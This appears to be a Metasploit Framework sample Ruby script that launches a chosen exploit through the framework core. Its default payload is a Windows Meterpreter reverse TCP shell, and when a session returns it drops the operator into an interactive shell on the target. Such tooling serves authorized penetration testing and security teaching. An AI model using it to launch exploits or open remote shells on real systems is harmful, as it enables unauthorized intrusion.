#!/usr/bin/env ruby # # This sample demonstrates using the framework core directly to launch an # exploit. It makes use of the simplified exploit wrapper method provided by # the Msf::Simple::Exploit mixin. # $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) require 'msf/base' if (ARGV.length == 0) puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS" exit end framework = Msf::Simple::Framework.create exploit_name = ARGV.shift || 'test/multi/aggressive' payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp' input = Rex::Ui::Text::Input::Stdio.new output = Rex::Ui::Text::Output::Stdio.new begin # Initialize the exploit instance exploit = framework.exploits.create(exploit_name) # Fire it off. session = exploit.exploit_simple( 'Payload' => payload_name, 'OptionStr' => ARGV.join(' '), 'LocalInput' => input, 'LocalOutput' => output) # If a session came back, try to interact with it. if (session) output.print_status("Session #{session.sid} created, interacting...") output.print_line session.init_ui(input, output) session.interact else output.print_line("Exploit completed, no session was created.") end rescue output.print_error("Error: #{$!}\n\n#{$@.join("\n")}") end